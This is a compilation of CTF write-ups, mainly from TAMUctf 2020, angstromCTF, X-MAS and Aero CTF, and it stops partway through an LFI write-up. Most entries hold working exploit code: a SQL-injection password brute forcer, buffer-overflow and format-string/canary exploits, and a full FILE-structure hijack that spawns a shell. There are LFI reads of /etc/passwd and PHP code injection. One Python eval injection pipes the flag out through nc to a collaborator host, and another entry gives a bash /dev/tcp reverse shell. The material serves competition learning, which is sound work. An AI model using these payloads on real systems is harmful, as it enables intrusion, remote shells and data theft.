url_form = "http://passwordextraction.tamuctf.com/login.php"payload = "username=foo&password=foo' OR 1=1 AND password LIKE '{}%"headers = { "User-Agent": "Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US);", "Content-Type": "application/x-www-form-urlencoded", "Origin": "http://passwordextraction.tamuctf.com", "Referer": "http://passwordextraction.tamuctf.com/"}
found_chars = "gigem{"while True: for new_char in string.printable.replace("%", "").replace("_", ""): attempt = found_chars + new_char print("[*] Attempt: '{}'.".format(attempt)) data = payload.format(attempt) print("[*] Payload: {}.".format(data)) page = None response_ok = False while not response_ok: try: page = requests.post(url_form, data=data, headers=headers) response_ok = True except: print("[!] EXCEPTION!") time.sleep(1 * 60) if "successfully authorized" in page.text: found_chars += new_char print("[*] Found chars: '{}'".format(found_chars)) break if found_chars[-1] == "}": break print("The FLAG is: {}".format(found_chars))```
The flag is the following.
```gigem{h0peYouScr1ptedTh1s}``` |
# ProblemThe problem is to find a pattern and solve it, the length is `26`. This challenge was a little guessing, but nothing that you can figure out in 10 minutes.After typing `F#{` and `A#{` I got the pattern, it returns `char(ord(input[i]) ^ ord(flag[i]))` to the user. This is a trivial problem.# Solution script```from pwn import *
r = remote('142.93.113.55', 31087)
brute = ""r.recvuntil(":")r.sendline("start")k = 0while len(brute) != 26: r.recvuntil("Input:") r.sendline(brute+'a') ln = r.recvline() nxt = ln.split(':')[1][len(brute)+1] if( nxt != '\x00' ): brute += chr(ord('a') ^ ord(nxt)) else: brute += 'a' print(brute)
k.close()``` |
Decompiled main:

the length of the input is not checked. We can therefore overwrite v5 with 0x1337BEEF
Exploit:
```pythonfrom pwn import *
v5 = 0x1337BEEF
payload = (("A"*32).encode())payload += p32(v5)
p = remote('challenges.tamuctf.com', 4252)print(p.recvuntil(': ').decode())p.sendline(payload)print(p.recvall().decode())```
# FLAG```gigem{0per4tion_skuld_74757474757275}``` |
This challenge after a bit of critical thinking wasn't too hard. Instead of bruteforcing, we realized that we could deduce the characters of the flag by returning their ascii values as the exit codes. Such a bash command looks like this `foo=$(head -c n flag.txt | tail -c 2); exit $(printf '%d' "'$foo")` Where you replace "n" after the -c tag with the index of the character you're looking to exract. After the program exits, you can compare the exit code to an ascii table. Rinse and repeat to get the flag. I could've wrote a script, I just did it manually because the flag was short, but it's clear to see how one could write a python script to iterate over the characters, get their ascii codes, convert them back to characters and get the flag |
# ▼▼▼MENTALMATH(Web:262pts,132/661=20.0%)▼▼▼This writeup is written by [**@kazkiti_ctf**](https://twitter.com/kazkiti_ctf)
---
## 【Vulnerability identification】
I guessed it was calculated by `eval()`.As a result of doing various things, we succeeded in the following.
↓
problem=`__import__('subprocess').check_output("nc fq9t6679b9hepavimvwu6df0nrthh6.burpcollaborator.net 80",shell=True)`&answer=0
↓
DNS access came!! **python arbitrary code execution**
---
## 【Get flag】
problem=`__import__('subprocess').check_output("nc $(ls|tr -d '\n')c.fq9t6679b9hepavimvwu6df0nrthh6.burpcollaborator.net 80",shell=True)`&answer=0
↓
The following DNS access comes```db.sqlite3flag.txtmanage.pymathgamementalmathrequirements.txtc.fq9t6679b9hepavimvwu6df0nrthh6.burpcollaborator.net.```
↓
`flag.txt`
---
problem=`__import__('subprocess').check_output("nc $(cat flag.txt|tr -cd 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789')c.fq9t6679b9hepavimvwu6df0nrthh6.burpcollaborator.net 80",shell=True)`&answer=0
↓
```gigem14mg0od47m4tH3m4aaticsn07s3cUr1tyh3h3h3hec.fq9t6679b9hepavimvwu6df0nrthh6.burpcollaborator.net.```
↓
`gigem{14mg0od47m4tH3m4aaticsn07s3cUr1tyh3h3h3he}`
↓
I can't submit and it looks like something is missing.
---
Try: convert `_` to `L`. That is, `sed -e 's/%5c_/L/g'`
↓
problem=`__import__('subprocess').check_output("nc $(cat flag.txt|sed -e 's/%5c_/L/g'|tr -cd 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789')c.fq9t6679b9hepavimvwu6df0nrthh6.burpcollaborator.net 80",shell=True)`&answer=0
↓```gigem1L4mLg0odL47Lm4tH3m4aaticsLn07Ls3cUr1tyLh3h3h3hec.fq9t6679b9hepavimvwu6df0nrthh6.burpcollaborator.net.```
↓ Convert `L` to `_`
`gigem{1_4m_g0od_47_m4tH3m4aatics_n07_s3cUr1ty_h3h3h3he}` |
Send requests...
Simple Python script ([pastebin](https://paste.ubuntu.com/p/gPtX4WkB9C/))```import requests from time import sleep while 1: resp = requests.get('http://challs.xmas.htsp.ro:1341/') if resp.ok: print(resp.text) if 'X-MAS' in resp.text: print('!!!!!!!') break else: print(resp) sleep(0.25)```
Flag: X-MAS{stay_at_home_and_respect_your_elders} |
For this challenge, we are given the following string:V1RJeGMySlhVa1pVYkZaVFltNVNTMXBGYUU5YWF6VkdaVVV4V1UxclduQlVWV2hYVFVabmQxTnRhRlpsYXpRMQ
From previous experience and intuition, this looks like base64. We decode this and get:WTIxc2JXUkZUbFZTYm5SS1pFaE9aazVGZUUxWU1rWnBUVWhXTUZnd1NtaFZlazQ1
This looks like base64 again. We decode this and get:Y21sbWRFTlVSbnRKZEhOZk5FeE1YMkZpTUhWMFgwSmhVek45
This looks like base64 again. We decode this and get: cmlmdENURntJdHNfNExMX2FiMHV0X0JhUzN9
This looks like base64 again. We decode this and get: riftCTF{Its_4LL_ab0ut_BaS3}
Flag: riftCTF{Its_4LL_ab0ut_BaS3} |
Python Selenium bruteforce solution:```from selenium import webdriverfrom selenium.webdriver.common.keys import Keysimport timedriver = webdriver.Chrome(r'[driver location]')driver.get("http://challs.xmas.htsp.ro:1341/")
text = driver.find_element_by_tag_name('body').text
while True: try: if not ("NO" in str(text) or "nginx" in str(text)): print(text) break else: text = driver.find_element_by_tag_name('body').text driver.refresh() except: time.sleep(0.2) driver.refresh()``` |
# SolutionIf you open the picture in a binary editor, you will see that the structure resembles a jpg file with some changes. After carefully comparing the file header with the jpg header, it becomes clear that each byte is replaced with 0xFF - currentByte.
```open("secret.jpg", "wb").write(bytes(map( lambda x : (0xFF - x) , list(open("secret.img", "rb").read()))))```
Done! |
# Easy points


You can open the image you've been givin with something the let's you have a look into the binary of the file.In it you will notice that the flag is visible in plain text within the first few bytes.

The flag is: X-MAS{Mr_R0b0t_C0NTR0L_1S_1LLUS10N} |
For this challenge, we are told that the flag is hidden on a post on LinkedIn. Lucky for us, LinkedIn has a search function, allowing us to directly search "riftCTF{" and find all posts containing the flag.
https://www.linkedin.com/search/results/content/?keywords=riftctf&origin=SWITCH_SEARCH_VERTICAL
Result: We find a post by a page called Ciphercell containing the flag.
Link: https://www.linkedin.com/posts/ciphercell_ciphercell-cybersecurity-activity-6633997672254660608-tVEH
Flag: riftCTF{W3lc0me_t0_c1ph3rcell}
Note: Post has been edited after the challenge and the flag is unavailable now. |
# Honest Question

The actual challenge here was not to find a flag but rather a number that would not reduce but increase your score.
On my test profile I tried the following:
Entered|Score ---:|---: 1000|-1000 0|0 -10000|-10000 -1000|1000
As the description states > ranging from -10,000 to 1,000
I stoppend there and submitted `-1000` for `1000` points.
### Flag: `-1000` |
# BLIND Writeup
### TAMUctf 2020 - Misc 50
> `nc challenges.tamuctf.com 3424`
#### Observations
I first encounter shell-like interface, which first prints `Execute :`. When I input random shell commands, It returns integer. I assumed that the integer response is a return code of shell command. To make the assumption solid, I ran `cat flag*` and found out the response code is `0`, which meant the command had successfully executed. I have solved by two methods.
#### Method 1: Bruteforce each byte
By using the oracle, we can bruteforce the flag value by each chars. By observing the return code of command `cat flag * | grep -F [flag_candidate]`, I could get the flag value byte by byte. Below is the [source code](solve.py).
```python#!/usr/bin/env python3import pwnfrom string import printable
# pwn.context.log_level = 'DEBUG'
IP, PORT = 'challenges.tamuctf.com', 3424p = pwn.remote(IP, PORT)
def execute(payload): p.sendlineafter('Execute: ', payload) return int(p.recvline(keepends=False))
flag = 'gigem{'for _ in range(30): for char in printable: if char in ['\\']: continue flag_cand = flag + char ret = execute('cat flag* | grep -F {}'.format('"{}"'.format(flag_cand))) if ret == 0: flag = flag_cand pwn.log.info(flag) if char == '}': assert flag == 'gigem{r3v3r53_5h3ll5}' pwn.log.success('flag = {}'.format(flag)) exit() break```
#### Method 2: Reverse Shell
After I obtained flag by using method 1, flag content told me there was much more simple solution. Just open reverse shell, assuming the system executes arbitrary command!
Input below command to blind shell.
```sh/bin/bash -i >& /dev/tcp/[IP]/[PORT] 0>&1```
Now listen from your server.
```shnv -lvp [PORT]```
Get reverse shell and profit. Here is the flag:
```gigem{r3v3r53_5h3ll5}``` |
# TL;DR
Too Many Credits was a web challenge with an unsafe Java object deserialization vulnerability. This result into a blind RCE thanks to ysoserial.
# Full WriteUp
Available at [https://www.aperikube.fr/docs/tamuctf_2020/too_many_credits/](https://www.aperikube.fr/docs/tamuctf_2020/too_many_credits/) |
# angstromCTF 2020###### tags: `Course`
## pwn
### Canary
flag: actf{youre_a_canary_killer_>:(}string format problem: leak canary with string format then bof
payload:
```lang=cfrom pwn import *flag = p64(0x400787)r = remote('shell.actf.co',20701)print(r.recvuntil(" name? "))payload = '%17$p'r.sendline(payload)data = r.recvuntil("\n")canary = data.split(',')[-1].strip()[:-1]canary_int = p64(int(canary,16))print(r.recvuntil("Anything else you want to tell me? "))payload = "a"*56 + canary_int + 'b'*8 + flagr.sendline(payload)r.interactive()```
#### Reference[format string wiki](https://en.wikipedia.org/wiki/Printf_format_string)kaibro edu-ctf[ctf wiki](https://ctf-wiki.github.io/ctf-wiki/pwn/linux/fmtstr/fmtstr_exploit-zh/)[format string course](https://github.com/qazbnm456/ctf-course/blob/master/slides/w4/format-string.md)
### BOP it! (Not solved)
memory leak with null bytes
https://github.com/r00tstici/writeups/blob/master/angstromCTF_2020/bop_it/README.md
## Web
### Consolation
flag: actf{you_would_n0t_beli3ve_your_eyes}
given a js file below, just find the function that would output the flag
```lang=cconsole[_0x4229('0x14', '70CK')](_0x4229('0x38', 'rwU*'));```
### Secret agent
flag: actf{nyoom_1_4m_sp33d}
simple sql injection(mysql) which reads the payload from user-agent field.
1. Utilize burp-suite to intercept requests.2. Modify the user-agent to the payload below.
payload
> Roselia' or 1=1 limit 2,1 #
### xmass still stand - not solved
xss attackpayload:
>
### Defund's Crypt - not solved
LFI attack(rce not reverse shell)upload php file and changes the MIME type and extension to jpgVisit the php file to rce
## Reverse
### Windows of Opportunity
flag: actf{ok4y_m4yb3_linux_is_s7ill_b3tt3r}
simply use idapro and will find the flag
### Autorev, Assemble! - Not solved
hundreds of functions with simple comparisonconstruct the string based on the given functions
utilize angr to solve the challenge
[Reference](https://github.com/archercreat/CTF-Writeups/blob/master/angstromctf/rev/Autorev%2C%20Assemble!/README.md)
### patcherman - Not Solved
patch program(section issue)
## Networking
### wireshark-2
flag: actf{ok_to_b0r0s-4809813}
reconstruct the jpeg file to gain the flag. After inspect the traffic, you'll find a packet with images, extract the image from the packet.

#### tools & reference
[wireshark refrence psh,ack](https://osqa-ask.wireshark.org/questions/20423/pshack-wireshark-capture)
[repair jpeg](https://online.officerecovery.com/pixrecovery/)
[eof of jpeg](https://stackoverflow.com/questions/4585527/detect-eof-for-jpg-images)
### ws3
flag: actf{git_good_git_wireshark-123323}
Git packfile reconstruction
Given a pcap file. Inspect the pcap file than you will find several http request / response related to git-receive packet and git-response packet.These traffic are request and response of files in git directory. To be more specific, the users are trying to fetch the data from remote repo.
[git fetching mechanism](https://stackoverflow.com/questions/27430312/what-does-git-fetch-really-do)
basically, client will first invoke upload-pack to remote repo, the repo will then compare the latest packfile with the uploaded one. Eventuall,y the repo will return those commit, objects that client lack to the client
In conclusion, those objects / commit received from repo contains the flag.
This is the main commit / objects.

After reassemble the whole packet, retrieve the packet start from PACK to the end. This will be our packfile.Save the packfile to .pack extension.
run the command to gain the idx file
> git index-pack *.pack
follow this youtube vedio to reconstruct the objects
https://www.youtube.com/watch?v=cauIy20JhFs
Then simply run git cat-file -p to gain the flag

#### reference
[hex to binary](https://tomeko.net/online_tools/hex_to_file.php?lang=en)
[git packfile doc](https://git-scm.com/book/en/v2/Git-Internals-Packfiles)
[packfile structure-1](https://codewords.recurse.com/issues/three/unpacking-git-packfiles)
[packfile structure-2](http://shafiul.github.io/gitbook/7_the_packfile.html)
[unpack packfile](https://www.youtube.com/watch?v=cauIy20JhFs)
[git command](https://www.juduo.cc/technique/62040.html)
[git unpack-objects](https://git-scm.com/docs/git-unpack-objects)
## misc
### inputter
flag: actf{impr4ctic4l_pr0blems_c4ll_f0r_impr4ctic4l_s0lutions}
reverse the code and input the argument with pwntools(arguments are not printable)
We have to solve this challenge through logging the shell and run the program.
Since the argv argument nor the fgets target is printable asciiwe should use pwnlib to tackle the unprintable ascii input issue
```lang=cfrom pwn import *r = process(["./inputter"," \n'\"\a"])r.sendline("\0")print(r.recv())```
### Shifter
flag:actf{h0p3_y0u_us3d_th3_f0rmu14-1985098}
simply implement ceasar cipher + dynamic programming
## Crypto
### keysar
flag: actf{yum_delicious_salad}
keyed ceasar: http://rumkin.com/tools/cipher/caesar-keyed.php
### Confused Streaming (Not solved)
Lots of meaning less function, just simply give input a,b,c which are valid parameter for a quadratic formula(二次方程式)
### One-Time bed (Not solved)
OTP with random(time.time()) vulnerability. Same seed generate same random numberHowever, failed to use the right seed, not any clue why it doesn't work.In this challenge, we can simply utilize brute force or multiple connection to solve the problem.
[brute force](https://masrt200.github.io/hacker-blog/Angstrom-CTF)[multiple connection](https://ctftime.org/writeup/18932) |
# Thanos won

The description says it all.You just had to refresh the webpage until you received the flag.As I am not a maniac sitting here refreshing one webpage a million times I just build a little script to do so for me.
```pythonimport requestsimport refrom time import sleepURL = "http://challs.xmas.htsp.ro:1341/"
p = re.compile('[^(NO)]*NO.*') # unnecessary compicated ( .*NO.* had been sufficient)
while True: sleep(0.1) # needed to prevent "503 Service Temporarily Unavailable" r = requests.get(url = URL) if (p.match(r.text)): continue print (r.text) break```
This will reload the page until it does not contain "NO" anymore. This was a little risky because if the flag contained "NO" it would not have stopped but continued indefinitely.But after just a few seconds it returned this:```1337X-MAS{stay_at_home_and_respect_your_elders}```
### Flag: `X-MAS{stay_at_home_and_respect_your_elders}` |
# Gamer92000 swag

This challenge was really easy. All you had to do was message Milkdrop and kindly ask for the flag.

The only problem was Milka aka Milkdrop had a simple security check in place.It looked something like this:
```cif( strcmp(message->from, "Gamer92000") != 0 || message->id != 246687234047213568) return;sendFlagTo(message->id);```Frankly this is my Discord name and ID! :smirk:
Here's why I got this:



### Flag: `X-MAS{SOMETASICDIUASCISADUCJASDIJCSIODCJSOIC}` |
TLDR
Check that the elliptic curve in the ECDH is supersingular. Supersingular elliptic curves are unsafe for ECDH as they have a small embedding degree. With embedding degree 2, implement the MOV attack and solve the dlog on a multiplicative group.
More in [https://sectt.github.io/writeups/Volga20/crypto_keygreed/README](https://sectt.github.io/writeups/Volga20/crypto_keygreed/README) |
The solution to this problem is a modified version of dijkstra. It is almost the same, just when you calculate the time to travel a path, you must also add waiting for the gate at the end.
I took a dijkstra solution from geekforgeek online: https://www.geeksforgeeks.org/python-program-for-dijkstras-shortest-path-algorithm-greedy-algo-7/
I modified their code to solve this problem, and then I used pwn tools to interface with the challenge and solve all the things. Solve 50 levels, and it gives the flag. It finishes with plenty of time to spare. |
# X-MAS{Circular_dependency_hell}

The flag was given. But how to submit a flag with no input?Clicking on the challenge showed the id:`https://xmas.htsp.ro/challenge?id=33`This could simply be used as a replacement in a different form. Sadly I cannot take any screenshots of this anymore as the forms get hidden after the GTF is over.It kinda looked like this:```html
<div class="challenge-submit"> <form method="post" class="form-flag" action="actions/challenges"> <input name="flag" id="flag-input-27" type="text" class="flag-input form-control form-group" placeholder="Please enter flag for challenge: Some challenge"></input> <input type="hidden" name="challenge" value="27" /> <input type="hidden" name="action" value="submit_flag" /> <button id="flag-submit-27" class="btn btn-lg btn-1 flag-submit-button" type="submit" data-countdown="???" data-countdown-done="Submit flag">Submit flag</button> </form></div>
``````html<input type="hidden" name="challenge" value="27" />-> replace with -><input type="hidden" name="challenge" value="33" />```After replacing `27` with `33` as the value of challenge you could simply enter the flag in the form you hijacked and submit.
### Flag: `X-MAS{Circular_dependency_hell}` |
# Bobi's wHack

This challenge is a reference to the original X-MAS CTF 2019.[Writeups can be found here.](https://ctftime.org/task/9995)
For this challenge the key was found on `Bobi's wHack` youtube channel.Once again a part of the flag was found in the [channel description](https://www.youtube.com/channel/UCskRBTQUbl8jqCmxFoEtqOA/about).
The rest of the flags could be found in the video desctiption of the following videos:https://www.youtube.com/watch?v=6LljxbL-xjo> _LOVES
https://www.youtube.com/watch?v=yPr_dCHjhaY> _THE_
https://www.youtube.com/watch?v=4p4VU_wU_2M> BUCI}
Adding `X-MAS` to this results in the flag.
### Flag: `X-MAS{BOBI_LOVES_THE_BUCI}` |
# Navigation Journal - Aero CTF 2020 (pwn, 473p, 14 solved)## Introduction
Navigation Journal is a pwn task.
An archive containing a binary, a libc and its corresponding loader (`ld.so`).
The binary provides the user with two journals : a main journal and a subjournal. The user can open, read and close the main journal. They can open, read,write and close the sub journal. They can also change their username.
This binary is a 32-bits binary.
## Reverse engineering
The program keeps opens and closes files. To keep track of its internal state,it uses a global variable `nav_jr`. Its type matches the following structure :```cchar subBuffer[0x400];char mainBuffer[0x200];FILE *mainJournal;FILE *subJournal;```
`open_main_journal` opens `/tmp/journal.txt````cnav_jr->mainJournal = fopen("/tmp/journal.txt", "r");```
`read_main_journal` reads the main journal into the main buffer. It prints itscontent.```cif(nav_jr->mainJournal != NULL) { fread(nav_jr->mainBuffer, 1, 0x200, nav_jr->mainJournal); write(STDOUT_FILENO, nav_jr->mainBuffer, 0x200);}```
`close_main_journal` closes the main journal```cif(nav_jr->mainJournal != NULL) fclose(nav_jr->mainJournal);```
These functions do not provide a great interest from an attacker's standpoint asnothing is controlled by the user.
`create_sub_journal` creates a file in `/tmp/`. The function first generates arandom name and asks the user if they agree with this name. If the user refuses,they can provide their own name. The name cannot contain any of the followingcharacters: `./tkasnfhglxd`
```cstrcpy(path, "/tmp/");strcat(path, generate_random_name());
if(askUser()) { read(STDIN_FILENO, buffer, 6); replace(buffer, "./tkasnfhglxd", ' ');
strcpy(path, "/tmp/"); strcat(path, buffer);}
printf("{+} New file name: ");printf(path);```
`close_sub_journal` flushes the sub journal buffer and closes it.```cif(nav_jr->subJournal != NULL) { fwrite(nav_jr->subBuffer, 0x400, nav_jr->subJournal); fclose(nav_jr->subJournal);}```
`read_sub_journal` displays 0x604 bytes of the sub journal buffer to the user.```cwrite(STDOUT_FILENO, nav_jr->subBuffer, 0x604);```
`write_sub_journal` reads 0x604 bytes to the sub journal buffer from the user.```cread(STDIN_FILENO, nav_jr->subBuffer, 0x604);```
## Exploitation
This program contains 3 vulnerabilities: two out-of-bounds (read and write) inthe `read_sub_journal` and `write_sub_journal` functions, and a format string inthe `open_sub_journal`.
The OOB read allows an attacker to leak the address of `nav_jr->mainJournal`.This address points to the program's heap.
The OOB write allows an attacker to overwrite the address of`nav_jr->mainJournal` and call the `FILE` functions with a crafterargument/structure.
The format string is not as powerful as a true format string as some characters,in particular `n` and `s` are blacklisted. It cannot be used to read or writearbitrary memory. On top of that, its size is very limited.
Capital letters are not replaced, this means the vulnerability can be used toleak variables on the stack with `%X`. An address of the libc can be retrievedwith `%17$X`.
The binary can be exploited by following these steps:1. leak libc base to defeat ASLR2. leak heap address to determine the address of `subBuffer`3. forge a fake `FILE` structure on `subBuffer`4. overwrite the `mainJournal` pointer with a pointer to the fake structure5. close the main journal to hijack the code execution flow
Closing the main journal will call `fclose(fp)`. By setting the vtable to call`system` instead of `fclose`, it is possible to have the program call`system("sh")`.
This can be done by having the first few bytes of the fake `FILE` structure tobe:```23 80 AD FB 0A #\x80\xAD\xFB\n73 68 00 sh\x00```
**Flag**: `Aero{e9b132dd85f0c1be26c01ab22e2e7d545dff7d52dbda745fe3dd5796bea14153}`
## Appendices
### pwn.php
```php#!/usr/bin/phpexpectLine("------ Navigation Journal ------"); $t->expectLine("1. Open main journal"); $t->expectLine("2. Read main journal"); $t->expectLine("3. Close main journal"); $t->expectLine("4. Create sub journal"); $t->expectLine("5. Write sub journal"); $t->expectLine("6. Read sub journal"); $t->expectLine("7. Close sub journal"); $t->expectLine("8. Change username"); $t->expectLine("9. Exit"); $t->expect("> ");}
function openSub(Tube $t, $name = null){ menu($t); $t->write("4\n");
$t->expect("{+} Creating journal with name </tmp/"); $rng = $t->read(16); $t->expectLine(">");
$leak = null; $t->expect("{?} Do you agree with this name?[Y\N]: "); if($name) { $t->write("N\n"); $t->expect("{?} Enter your name: "); $t->write($name); $t->expect("{+} New file name: /tmp/"); $leak = $t->readLine();
if(6 === strlen($name)) $t->expect("N"); }
return [$rng, $leak];}
function closeSub($t){ menu($t); $t->write("7\n");}
function write(Tube $t, $data){ menu($t); $t->write("5\n"); $t->expect("{?} Enter data: "); $t->write($data);}
$t = new Socket("tasks.aeroctf.com", 33013);$t->expect("Enter your name: ");$t->write("foobar\n");$t->expect("Hello, ");$t->readLine();
list($rng, $leak) = openSub($t, "%17\$X\n");$libc = hexdec($leak) - 0xF7EF3B23 + 0xf7e1e000;printf("[+] libc: %08X\n", $libc);closeSub($t);
list($rng, $leak) = openSub($t, "%13\$X\n");$heap = hexdec($leak) - 0x1830;printf("[+] heap: %08X\n", $heap);
$struct = pack("V*", 0xFBAD0000 | 0x8000 | ord("#"), // _flags unpack("V", "\nsh\0")[1], $libc + 0x0003ada0, 0x00000000, //_IO_read_{ptr,end,base}
0x00000000, 0x00000000, 0x00000000, //_IO_write_{base,ptr,end} 0x00000000, 0x00000000, //_IO_buf_{base,end} 0x00000000, 0x00000000, 0x00000000, //_IO_save_base,backup_base,save_end 0x00000000, // _IO_marker 0x00000000, // _chain 0x00000000, // fileno 0x00000000, // flags2 0xFFFFFFFF, // _old_offset 0x00000000, // cur_column + vtable_offset + shortbuf 0xdeadbeef, // lock 0xFFFFFFFF, 0xFFFFFFFF, // offset quad 0x00000000, 0x00000000, 0x00000000, 0x00000000, // pad 0x00000000, // pad5 0x00000000, // mode 0x00000000, 0x00000000, 0x00000000, 0x00000000, // unused) . pack("V", 0xcafebabe). pack("V", 0xcafebabe). pack("V", 0xcafebabe). pack("V", 0xcafebabe). pack("V", 0xcafebabe). pack("V", 0xcafebabe). pack("V", $heap + 0x08);$payload = str_pad($struct, 0x600) . pack("V", $heap + 0x08);write($t, $payload);
menu($t);$t->write("3\n");
printf("[+] Pipe\n");$t->pipe();``` |
For this challenge, we are given an image, carreg.png, and we need to find the brand and model of the car as well as when they were first produced.
Looking into the plate patterns of license plates from different countries, we find that the car is from the United Kingdom. Using this knowledge, we can go to the UK government site for vehicle lookup and use the license plate in the image to get more information.
We find that the car is a Ford, but we still don't know the model. Doing a reverse image search of the car tells us that it is a Ford Ka. The flag requires that we find the year that it was first produced, so we lookup production dates of Ford Ka and find that the second generation was first produced in 2008.
Flag: riftCTF{Fordka 2008} |
# TAMUctf 2020 – FILESTORAGE
* **Category:** web* **Points:** 122
## Challenge
> Try out my new file sharing site!> > http://filestorage.tamuctf.com
## Solution
The website takes a `name` parameter and allows you to read some files.
```POST /index.php HTTP/1.1Host: filestorage.tamuctf.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedContent-Length: 8Origin: http://filestorage.tamuctf.comConnection: closeReferer: http://filestorage.tamuctf.com/index.phpCookie: PHPSESSID=11fcvj19chosurikvujm4639cqUpgrade-Insecure-Requests: 1
name=foo
HTTP/1.1 200 OKServer: nginx/1.16.1Date: Fri, 20 Mar 2020 02:13:01 GMTContent-Type: text/html; charset=UTF-8Content-Length: 542Connection: closeX-Powered-By: PHP/7.3.15Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cache
<html> <head> <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.3.1/css/bootstrap.min.css" integrity="sha384-ggOyR0iXCbMQv3Xipma34MD+dH/1fQ784/j6cY/iJTQUOhcWr7x9JvoRxT2MZw1T" crossorigin="anonymous"> </head> <body> Hello, foobeemovie.txthello.txtpi.txt </body></html>```
Analyzing the read files page, you can discover that the website is vulnerable to LFI.
```GET /index.php?file=../../../../../../../../etc/passwd HTTP/1.1Host: filestorage.tamuctf.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateConnection: closeCookie: PHPSESSID=k2qs029jna7vcppkeqinfh4kjaUpgrade-Insecure-Requests: 1Cache-Control: max-age=0
HTTP/1.1 200 OKServer: nginx/1.16.1Date: Fri, 20 Mar 2020 00:38:30 GMTContent-Type: text/html; charset=UTF-8Content-Length: 1561Connection: closeX-Powered-By: PHP/7.3.15Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cache
<html> <head> <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.3.1/css/bootstrap.min.css" integrity="sha384-ggOyR0iXCbMQv3Xipma34MD+dH/1fQ784/j6cY/iJTQUOhcWr7x9JvoRxT2MZw1T" crossorigin="anonymous"> </head> <body> ? Go backroot:x:0:0:root:/root:/bin/ashbin:x:1:1:bin:/bin:/sbin/nologindaemon:x:2:2:daemon:/sbin:/sbin/nologinadm:x:3:4:adm:/var/adm:/sbin/nologinlp:x:4:7:lp:/var/spool/lpd:/sbin/nologinsync:x:5:0:sync:/sbin:/bin/syncshutdown:x:6:0:shutdown:/sbin:/sbin/shutdownhalt:x:7:0:halt:/sbin:/sbin/haltmail:x:8:12:mail:/var/mail:/sbin/nologinnews:x:9:13:news:/usr/lib/news:/sbin/nologinuucp:x:10:14:uucp:/var/spool/uucppublic:/sbin/nologinoperator:x:11:0:operator:/root:/sbin/nologinman:x:13:15:man:/usr/man:/sbin/nologinpostmaster:x:14:12:postmaster:/var/mail:/sbin/nologincron:x:16:16:cron:/var/spool/cron:/sbin/nologinftp:x:21:21::/var/lib/ftp:/sbin/nologinsshd:x:22:22:sshd:/dev/null:/sbin/nologinat:x:25:25:at:/var/spool/cron/atjobs:/sbin/nologinsquid:x:31:31:Squid:/var/cache/squid:/sbin/nologinxfs:x:33:33:X Font Server:/etc/X11/fs:/sbin/nologingames:x:35:35:games:/usr/games:/sbin/nologincyrus:x:85:12::/usr/cyrus:/sbin/nologinvpopmail:x:89:89::/var/vpopmail:/sbin/nologinntp:x:123:123:NTP:/var/empty:/sbin/nologinsmmsp:x:209:209:smmsp:/var/spool/mqueue:/sbin/nologinguest:x:405:100:guest:/dev/null:/sbin/nologinnobody:x:65534:65534:nobody:/:/sbin/nologinapache:x:100:101:apache:/var/www:/sbin/nologin </body></html>```
You can abuse this vulnerability to analyze the `/proc/self/` directory in order to how the website stores the passed `name` parameter.
```GET /index.php?file=../../../../../../proc/self/fd/9 HTTP/1.1Host: filestorage.tamuctf.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateConnection: closeReferer: http://filestorage.tamuctf.com/index.phpCookie: PHPSESSID=11fcvj19chosurikvujm4639cqUpgrade-Insecure-Requests: 1
HTTP/1.1 200 OKServer: nginx/1.16.1Date: Fri, 20 Mar 2020 02:13:55 GMTContent-Type: text/html; charset=UTF-8Content-Length: 357Connection: closeX-Powered-By: PHP/7.3.15Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cache
<html> <head> <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.3.1/css/bootstrap.min.css" integrity="sha384-ggOyR0iXCbMQv3Xipma34MD+dH/1fQ784/j6cY/iJTQUOhcWr7x9JvoRxT2MZw1T" crossorigin="anonymous"> </head> <body> ? Go backname|s:3:"foo"; </body></html>```
It seems that `name` is stored using PHP serialization and can be located into `/proc/self/fd/9` file. If you perform LFI to read a file including PHP code, it will be executed.
So you can pass a PHP command for the `name` value, like ``.
```POST /index.php HTTP/1.1Host: filestorage.tamuctf.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedContent-Length: 45Origin: http://filestorage.tamuctf.comConnection: closeReferer: http://filestorage.tamuctf.com/index.phpCookie: PHPSESSID=boig3tsj1931578ghio3a9fderUpgrade-Insecure-Requests: 1
name=%3C%3Fphp+system%28%27id%27%29%3B+%3F%3E
HTTP/1.1 200 OKServer: nginx/1.16.1Date: Fri, 20 Mar 2020 02:10:47 GMTContent-Type: text/html; charset=UTF-8Content-Length: 561Connection: closeX-Powered-By: PHP/7.3.15Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cache
